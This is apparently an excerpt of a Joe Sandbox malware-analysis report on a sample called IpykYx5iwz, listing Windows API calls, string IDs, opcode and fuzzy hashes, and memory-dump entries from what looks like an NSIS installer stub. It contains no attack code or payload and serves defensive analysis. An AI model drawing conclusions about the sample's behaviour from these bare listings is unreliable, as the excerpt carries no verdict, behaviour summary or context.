                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-224404859
                                                  • Opcode ID: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
                                                  • Instruction ID: ad81f5c4ab787ee770feeffe55fa4e6664f7768c70419f776603619960e766e8
                                                  • Opcode Fuzzy Hash: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
                                                  • Instruction Fuzzy Hash: 31D0A7B2408D705EE3036210DD04B8F7A99CF12300F0A00A3E081B6191C6786C4287BD
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C4F
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C67
                                                  • CharNextA.USER32(00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C78
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 62ddd0860e25498249f603dfcc8213b483479843cbbb52d6d221ef9dbd1560f9
                                                  • Instruction ID: e9647eef7302a9b27fadec00dc75fba78c5d05178a58941879d213f1a9d3a1c7
                                                  • Opcode Fuzzy Hash: 62ddd0860e25498249f603dfcc8213b483479843cbbb52d6d221ef9dbd1560f9
                                                  • Instruction Fuzzy Hash: 5BF0C231105918FFDB029FA4DD409AEBBA8EF05250B2540BAE840F7210D634EE01AB98
                                                  APIs
                                                  • SetErrorMode.KERNEL32 ref: 004033A9
                                                  • GetVersion.KERNEL32 ref: 004033AF
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033E2
                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040341E
                                                  • OleInitialize.OLE32(00000000), ref: 00403425
                                                  • SHGetFileInfoA.SHELL32(0041FCF0,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403441
                                                  • GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 00403456
                                                  • CharNextA.USER32(00000000,0042A000,00000020,0042A000,00000000,?,00000006,00000008,0000000A), ref: 00403492
                                                  • GetTempPathA.KERNEL32(00000400,0042B400,00000000,00000020,?,00000006,00000008,0000000A), ref: 0040358F
                                                  • GetWindowsDirectoryA.KERNEL32(0042B400,000003FB,?,00000006,00000008,0000000A), ref: 004035A0
                                                  • lstrcatA.KERNEL32(0042B400,\Temp,?,00000006,00000008,0000000A), ref: 004035AC
                                                  • GetTempPathA.KERNEL32(000003FC,0042B400,0042B400,\Temp,?,00000006,00000008,0000000A), ref: 004035C0
                                                  • lstrcatA.KERNEL32(0042B400,Low,?,00000006,00000008,0000000A), ref: 004035C8
                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,0042B400,0042B400,Low,?,00000006,00000008,0000000A), ref: 004035D9
                                                  • SetEnvironmentVariableA.KERNEL32(TMP,0042B400,?,00000006,00000008,0000000A), ref: 004035E1
                                                  • DeleteFileA.KERNEL32(0042B000,?,00000006,00000008,0000000A), ref: 004035F5
                                                    • Part of subcall function 004064D9: GetModuleHandleA.KERNEL32(?,?,?,004033F7,0000000A), ref: 004064EB
                                                    • Part of subcall function 004064D9: GetProcAddress.KERNEL32(00000000,?), ref: 00406506
                                                    • Part of subcall function 0040395E: lstrlenA.KERNEL32(004236C0,?,?,?,004236C0,00000000,0042A400,0042B000,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,74DF3410), ref: 00403A4E
                                                    • Part of subcall function 0040395E: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A61
                                                    • Part of subcall function 0040395E: GetFileAttributesA.KERNEL32(004236C0), ref: 00403A6C
                                                    • Part of subcall function 0040395E: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,0042A400), ref: 00403AB5
                                                    • Part of subcall function 0040395E: RegisterClassA.USER32(00423EC0), ref: 00403AF2
                                                    • Part of subcall function 0040386C: CloseHandle.KERNEL32(FFFFFFFF,0042B400,004036A3,?,?,00000006,00000008,0000000A), ref: 0040387E
                                                    • Part of subcall function 0040386C: CloseHandle.KERNEL32(FFFFFFFF,0042B400,004036A3,?,?,00000006,00000008,0000000A), ref: 00403892
                                                  • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004036A3
                                                  • ExitProcess.KERNEL32 ref: 004036C4
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 004037E1
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004037E8
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403800
                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040381F
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403843
                                                  • ExitProcess.KERNEL32 ref: 00403866
                                                    • Part of subcall function 0040585D: MessageBoxIndirectA.USER32(0040A230), ref: 004058B8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                  • String ID: "$.tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 538718688-3941163293
                                                  • Opcode ID: 458bdf0e04cdd0baede758a66e37d725f1f5fb22902ef0c1a756b50b2141e9f2
                                                  • Instruction ID: 4384c8e2b939b42067d375ed445cc130ba198a6ce93f9d773e0a7c2deed02dc2
                                                  • Opcode Fuzzy Hash: 458bdf0e04cdd0baede758a66e37d725f1f5fb22902ef0c1a756b50b2141e9f2
                                                  • Instruction Fuzzy Hash: 98C108706047506AD721AF75AD49B2B3EACEF81306F05443FF591BA1E2CB7C8A15872E
                                                  APIs
                                                  • DeleteFileA.KERNEL32(?,?,74DF3410,74DF2EE0,00000000), ref: 00405932
                                                  • lstrcatA.KERNEL32(00421D38,\*.*,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 0040597A
                                                  • lstrcatA.KERNEL32(?,0040A014,?,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 0040599B
                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 004059A1
                                                  • FindFirstFileA.KERNEL32(00421D38,?,?,?,0040A014,?,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 004059B2
                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A5F
                                                  • FindClose.KERNEL32(00000000), ref: 00405A70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: \*.*
                                                  • API String ID: 2035342205-1173974218
                                                  • Opcode ID: 1f6095b956a5abea02a704f6b19d74ec103097257d08da1b7e7a910a37ef6182
                                                  • Instruction ID: 27aaa2d61bcc81dbc7fe7a1ecb0f7f08d06d16e834bef461c94bc9154c43beac
                                                  • Opcode Fuzzy Hash: 1f6095b956a5abea02a704f6b19d74ec103097257d08da1b7e7a910a37ef6182
                                                  • Instruction Fuzzy Hash: 9651B271A04A04AACB21AB618C89BBF7BB8DF42724F14427BF451751D2D73C4982DE6E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d7b46422ea3febcc3dfec7e4f4e14f5e1a14e9fd76d5679f282581756d1a8c3
                                                  • Instruction ID: 7a1e34af05216305e42a36fadcfa131d67e9d7ad70080566c8310abef1b5d03e
                                                  • Opcode Fuzzy Hash: 3d7b46422ea3febcc3dfec7e4f4e14f5e1a14e9fd76d5679f282581756d1a8c3
                                                  • Instruction Fuzzy Hash: 2CF18571D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A86CF45
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405405
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405414
                                                  • GetClientRect.USER32(?,?), ref: 00405451
                                                  • GetSystemMetrics.USER32(00000002), ref: 00405458
                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405479
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040548A
                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040549D
                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 004054AB
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 004054BE
                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004054E0
                                                  • ShowWindow.USER32(?,00000008), ref: 004054F4
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405515
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405525
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040553E
                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040554A
                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405423
                                                    • Part of subcall function 00404204: SendMessageA.USER32(00000028,?,00000001,00404034), ref: 00404212
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405566
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000533A,00000000), ref: 00405574
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040557B
                                                  • ShowWindow.USER32(00000000), ref: 0040559E
                                                  • ShowWindow.USER32(?,00000008), ref: 004055A5
                                                  • ShowWindow.USER32(00000008), ref: 004055EB
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040561F
                                                  • CreatePopupMenu.USER32 ref: 00405630
                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405645
                                                  • GetWindowRect.USER32(?,000000FF), ref: 00405665
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040567E
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056BA
                                                  • OpenClipboard.USER32(00000000), ref: 004056CA
                                                  • EmptyClipboard.USER32 ref: 004056D0
                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 004056D9
                                                  • GlobalLock.KERNEL32(00000000), ref: 004056E3
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056F7
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405710
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 0040571B
                                                  • CloseClipboard.USER32 ref: 00405721
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: 0B
                                                  • API String ID: 590372296-4132856435
                                                  • Opcode ID: ac0908efb29991f9f7612423f5cb2e6f0edb2ee2ffb265e7f658777761b029f9
                                                  • Instruction ID: 3d4d3d9973c8e241304b7258fdbe4eb8662a2ffc95f0db4602c58cf82c677d54
                                                  • Opcode Fuzzy Hash: ac0908efb29991f9f7612423f5cb2e6f0edb2ee2ffb265e7f658777761b029f9
                                                  • Instruction Fuzzy Hash: 74A16A71900608BFDB119FA4DE89AAE7B79FB48355F00403AFA44B61A0CB754E51DF68
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404BEB
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404BF8
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C47
                                                  • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C5E
                                                  • SetWindowLongA.USER32(?,000000FC,004051DC), ref: 00404C78
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C8A
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C9E
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404CB4
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404CC0
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404CD0
                                                  • DeleteObject.GDI32(00000110), ref: 00404CD5
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404D00
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404D0C
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404DA6
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404DD6
                                                    • Part of subcall function 00404204: SendMessageA.USER32(00000028,?,00000001,00404034), ref: 00404212
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404DEA
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404E18
                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404E26
                                                  • ShowWindow.USER32(?,00000005), ref: 00404E36
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404F31
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F96
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404FAB
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404FCF
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404FEF
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405004
                                                  • GlobalFree.KERNEL32(?), ref: 00405014
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040508D
                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00405136
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405145
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405165
                                                  • ShowWindow.USER32(?,00000000), ref: 004051B3
                                                  • GetDlgItem.USER32(?,000003FE), ref: 004051BE
                                                  • ShowWindow.USER32(00000000), ref: 004051C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: 8f5a1c4aa5113f352fc46f697d9e306d8de9479be2c67950049f22cbc462bb38
                                                  • Instruction ID: e03921bd6c6e4a37bdfb411e954e05a497c968e6c467d94503d0be5cca2fcafc
                                                  • Opcode Fuzzy Hash: 8f5a1c4aa5113f352fc46f697d9e306d8de9479be2c67950049f22cbc462bb38
                                                  • Instruction Fuzzy Hash: 7E024CB0A00209AFDF209F94DD45AAE7BB5FB84354F10813AF610BA2E1D7799D42DF58
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D37
                                                  • ShowWindow.USER32(?), ref: 00403D54
                                                  • DestroyWindow.USER32 ref: 00403D68
                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D84
                                                  • GetDlgItem.USER32(?,?), ref: 00403DA5
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403DB9
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403DC0
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403E6E
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E78
                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403E92
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403EE3
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403F89
                                                  • ShowWindow.USER32(00000000,?), ref: 00403FAA
                                                  • EnableWindow.USER32(?,?), ref: 00403FBC
                                                  • EnableWindow.USER32(?,?), ref: 00403FD7
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FED
                                                  • EnableMenuItem.USER32(00000000), ref: 00403FF4
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040400C
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040401F
                                                  • lstrlenA.KERNEL32(00420D30,?,00420D30,00000000), ref: 00404049
                                                  • SetWindowTextA.USER32(?,00420D30), ref: 00404058
                                                  • ShowWindow.USER32(?,0000000A), ref: 0040418C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID: 0B
                                                  • API String ID: 184305955-4132856435
                                                  • Opcode ID: ab6da0646cfc314af1bada8ded2489a09d542cdefb29361912f124bcb7d64920
                                                  • Instruction ID: 7396c87bec48d1de0b65d229f3995359e9ede5a691df1363d58f31033cac92c3
                                                  • Opcode Fuzzy Hash: ab6da0646cfc314af1bada8ded2489a09d542cdefb29361912f124bcb7d64920
                                                  • Instruction Fuzzy Hash: B3C122B1600301EBCB216F61ED89E2B3AB8FB85306F51053EF651B51F1CB7999829B1D
                                                  APIs
                                                    • Part of subcall function 004064D9: GetModuleHandleA.KERNEL32(?,?,?,004033F7,0000000A), ref: 004064EB
                                                    • Part of subcall function 004064D9: GetProcAddress.KERNEL32(00000000,?), ref: 00406506
                                                  • lstrcatA.KERNEL32(0042B000,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,74DF3410,0042B400,0042A000,00000000), ref: 004039D9
                                                  • lstrlenA.KERNEL32(004236C0,?,?,?,004236C0,00000000,0042A400,0042B000,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,74DF3410), ref: 00403A4E
                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A61
                                                  • GetFileAttributesA.KERNEL32(004236C0), ref: 00403A6C
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,0042A400), ref: 00403AB5
                                                    • Part of subcall function 0040609F: wsprintfA.USER32 ref: 004060AC
                                                  • RegisterClassA.USER32(00423EC0), ref: 00403AF2
                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403B0A
                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B3F
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B75
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403BA1
                                                  • GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403BAE
                                                  • RegisterClassA.USER32(00423EC0), ref: 00403BB7
                                                  • DialogBoxParamA.USER32(?,00000000,00403CFB,00000000), ref: 00403BD6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$0B$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                  • API String ID: 1975747703-610843794
                                                  • Opcode ID: 85ceac433090de6822b423d9ce6217ac409b436af6a9068422674f926c817ff9
                                                  • Instruction ID: b29c60b9e4819681180a0682236be2a56282820a6c44356677c11e3a39c8f367
                                                  • Opcode Fuzzy Hash: 85ceac433090de6822b423d9ce6217ac409b436af6a9068422674f926c817ff9
                                                  • Instruction Fuzzy Hash: 0961D8707406046ED620AF65AD45F273EACDB8574AF40043FF951B22E2CB7D9D068A3D
                                                  APIs
                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004043C5
                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 004043D9
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043F7
                                                  • GetSysColor.USER32(?), ref: 00404408
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404417
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404426
                                                  • lstrlenA.KERNEL32(?), ref: 00404429
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404438
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040444D
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004044AF
                                                  • SendMessageA.USER32(00000000), ref: 004044B2
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004044DD
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040451D
                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0040452C
                                                  • SetCursor.USER32(00000000), ref: 00404535
                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 0040454B
                                                  • SetCursor.USER32(00000000), ref: 0040454E
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040457A
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040458E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: N
                                                  • API String ID: 3103080414-1130791706
                                                  • Opcode ID: 72a3c28b782e43d93af6a515465b4a3c8a00c1c9b326746d399ca05344fe1376
                                                  • Instruction ID: 25b6b162fa7d48e4e961d9928df0462ddf83e59e31dd5b95d6ec5816e65db8cb
                                                  • Opcode Fuzzy Hash: 72a3c28b782e43d93af6a515465b4a3c8a00c1c9b326746d399ca05344fe1376
                                                  • Instruction Fuzzy Hash: 6E6182B1A00209BBDF109F61DD45B6A7B69FF84710F10813AFB15BA1D1C7B8A951CF98
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
